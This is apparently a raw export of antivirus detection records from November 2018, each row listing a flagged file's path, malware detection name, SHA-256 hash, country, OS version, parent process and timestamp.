  Row(detection=Row(filename='tmp0000074b', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp0000074b', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='59f518907197ac6d73dfa405e3361bfa2152c072941e19dd7db256a225c3b352', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_29.10.2018-24.categorizing\\59F518907197AC6D73DFA405E3361BFA2152C072941E19DD7DB256A225C3B352', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='59f518907197ac6d73dfa405e3361bfa2152c072941e19dd7db256a225c3b352', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T06:32:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:39:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000098ef', filepath='C:\\Windows\\Temp\\tmp00007606\\tmp000098ef', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='12ea8f6ae346537b54240f6ad515453796a6dca5dcbe5fd5b9feceb6ac0c280d', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T11:32:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T14:59:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\borym2fzfn2\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/monitor', country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T10:35:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c0e83ca936d5180d3cc27144ce1469e9b8dceeed062081236663d5d3f80cb8b1', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3137.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3137.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094036-d26422c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094036-D26422C1', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:40:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='8a0b5ce8efce35074a98166f29b454194d3ac777765af760041a8c0875aa5a2c', metadata=Row(cmdline='-k BitStreamingDrv', country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\svchost.exe', parentsize=20992, timestamp='2018-11-01T08:01:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094912-3559f7d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094912-3559F7D7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:49:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='bf213ca462e6044e538f444a9351ccd17310c8f36909be2987f9ba27b1521180', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144619-315ca66d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_126cde34\\AVSCAN-20181101-144411-15BA419C\\AVSCAN-20181101-144619-315CA66D', filesize=256000, name='TR/Qadars.DV.#M1.#R1'), hash='bda35141854d6ab62fe8bac8c978b01b9249fc6486e7ce76a43363dee1a6d294', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:43:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8f680e6c19e8a1153eb530b94525a0336cecd634c48304736f38ba5bc6387183', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\8F680E6C19E8A1153EB530B94525A0336CECD634C48304736F38BA5BC6387183', filesize=3264000, name='TR/Crypt.XPACK.Gen.#M300.#R3923'), hash='8f680e6c19e8a1153eb530b94525a0336cecd634c48304736f38ba5bc6387183', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:24:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-203629-c7962d94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd60ab4d\\AVSCAN-20181101-203545-BFF2187F\\AVSCAN-20181101-203629-C7962D94', filesize=8000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='ebb357cc4d066bca88c3c2b696add4b0537025d1b5e5bb17374340a31390e69b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:40:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='de1b124392da6f71841028a05e7f1b4f3f15d8c35903de88f04119b60540c7a9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\DE1B124392DA6F71841028A05E7F1B4F3F15D8C35903DE88F04119B60540C7A9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='de1b124392da6f71841028a05e7f1b4f3f15d8c35903de88f04119b60540c7a9', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:12:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ndp46-kb3045560-web.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\Redist\\DotNet\\NDP46-KB3045560-Web.exe', filesize=192000, name='W32/Stanit.#M1.#R1'), hash='b5f1fddc646129d18881165e61a34decbf12ac8274a756119958ca55f91f4c4e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152220-8d42cc6b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152220-8D42CC6B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151638-4bb8af3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151638-4BB8AF3A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:16:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='9e7f2db891b8037ec67d537f89f81b79df205f83f0705d16cc8753d791013cd6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\zbimm3andto\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1539843432.5bc825683a740', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AZ\\499287.exe', parentsize=671232, timestamp='2018-11-01T06:00:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\zwudc5ecfks\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18534016, timestamp='2018-11-01T03:10:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-073601-134cabe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_08baa923\\AVSCAN-20181101-073454-0BE3AB17\\AVSCAN-20181101-073601-134CABE0', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='e382b2754e9d655c30e73005ff3bdae57ca33692baa8bb3d26b327d341bd1067', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:51:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{2EE500BE-2AB5-49DB-9AE1-E1ACF7D4782D}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='f030351daaac98d580492f18a9dabe541f2e6dc8249bc3a40a95e0c36e5dbe15', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b405f8972ceda4809909c6f233805462452eb67d32b04a4eca4b6f3d95175684', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\B405F8972CEDA4809909C6F233805462452EB67D32B04A4ECA4B6F3D95175684', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b405f8972ceda4809909c6f233805462452eb67d32b04a4eca4b6f3d95175684', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215847-b22132ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6c347803\\AVSCAN-20181101-214306-4DF0AA30\\AVSCAN-20181101-215847-B22132AB', filesize=1536000, name='TR/Dropper.Gen.#M1.#R1'), hash='a766e86b8157a590bafa1466d0c2883d87541742f26db5ffa165b403124cfacf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:58:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='operatore forestale responsabile.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\AGRICOLI\\OPERATORE FORESTALE RESPONSABILE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-131052-4172258e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1ee14c03\\AVSCAN-20181104-130740-20707A78\\AVSCAN-20181104-131052-4172258E', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='003ba151219f945cb613302233617c71dbf7754e1527a1430de85cb1ac4d433f', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:10:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='isnpbu.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\isnpbu.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:03:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe91_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe91 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T19:25:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\Program Files\\Avira\\AntiVir Desktop\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T18:04:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T18:19:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='I:\\Software\\narm afzar\\autorun.exe', filesize=1024000, name='HEUR/AGEN.1004285.#M1.#R1'), hash='95e83520037d14e9be60ae27e6fe2057796832908b56aa38b1d83c9cfd7b6071', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-04T16:58:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.vir', filepath='C:\\Users\\X\\Desktop\\VAULTMINER v0.1 (NVIDIA GPU)\\VAULTMINER v0.1 (NVIDIA GPU)\\miner.VIR', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-Embedding', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\RuntimeBroker.exe', parentsize=None, timestamp='2018-11-04T21:56:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp5956039\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\gta_2734584058.exe', parentsize=2439816, timestamp='2018-11-04T20:01:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='33995aaa-5a69-c9d8-976d-bb468e167c8a.exe', filepath='G:\\{8709e696-70ca-beea-86ba-6ad8b79b2e72}\\33995aaa-5a69-c9d8-976d-bb468e167c8a.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='535d6a370c11ea8999e478968994022ae16c60fb69f0fa5e76b4a6a9403f1c8f', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T06:28:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3825496\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\mfevtps.exe', parentsize=None, timestamp='2018-11-04T12:36:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T13:16:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='708fff5dbb8c1910b34d2539c0b137471916bed982ab97e2f8f1068bd9a0592a', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T10:29:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe105_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe105 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:04:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130557-ff3927e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130557-FF3927E4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:05:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1660435\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/ppn:YHhybg0dXAt1eGqREw \\\\\\/RR \\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\songr (1).exe', parentsize=2510000, timestamp='2018-11-04T12:17:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pylori.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Jakes\\pylori.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='53112f2b6c10d984e232910c546905079a1e1147948a69dbe1ed1c66e86c58d2', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202222-afb0a598', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-201403-72C9CBBB\\AVSCAN-20181104-202222-AFB0A598', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T13:22:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='\\\\?\\E:\\迅雷下载\\Zemax V13 R2 SP4 x64\\z132sp4_x64_crack\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='5dd017a7cf6dd69056bbd2dbef9d18fc224217d502c25efd60e1504f47b24705', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:22:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-230114-0fab8832', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2754a3e3\\AVSCAN-20181104-173744-35C87BC3\\AVSCAN-20181104-230114-0FAB8832', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='398b9784731795a2a9159ae69dea840751d74fbe0f64b1e1929ea2fce6c6f138', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:01:14Z'), dt=datetime.date(2018, 11, 4)),
